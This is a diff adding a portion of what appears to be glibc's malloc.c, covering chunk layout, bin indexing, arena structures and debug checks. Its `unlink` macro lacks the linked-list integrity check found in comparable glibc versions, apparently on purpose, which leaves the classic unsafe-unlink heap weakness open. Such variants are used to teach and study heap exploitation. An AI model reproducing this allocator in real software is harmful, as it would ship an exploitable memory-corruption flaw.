+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+#define unlink(AV, P, BK, FD) {\
+    FD = P->fd;\
+    BK = P->bk;\
+    FD->bk = BK;\
+    BK->fd = FD;\
+    if (!in_smallbin_range (P->size)\
+        && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
+            if (FD->fd_nextsize == NULL) {\
+                if (P->fd_nextsize == P)\
+                  FD->fd_nextsize = FD->bk_nextsize = FD;\
+                else {\
+                    FD->fd_nextsize = P->fd_nextsize;\
+                    FD->bk_nextsize = P->bk_nextsize;\
+                    P->fd_nextsize->bk_nextsize = FD;\
+                    P->bk_nextsize->fd_nextsize = FD;\
+                }\
+            } else {\
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
+            }\
+    }\
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  /*INTERNAL_SIZE_T  sbrked_mem;*/
+  /*INTERNAL_SIZE_T  max_sbrked_mem;*/
+  INTERNAL_SIZE_T max_mmapped_mem;
+  INTERNAL_SIZE_T max_total_mem;  /* only kept for NO_THREADS */
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+};
+
+
+/*  Non public mallopt parameters.  */
+#define M_ARENA_TEST -7
+#define M_ARENA_MAX  -8
+
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((p->prev_size + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
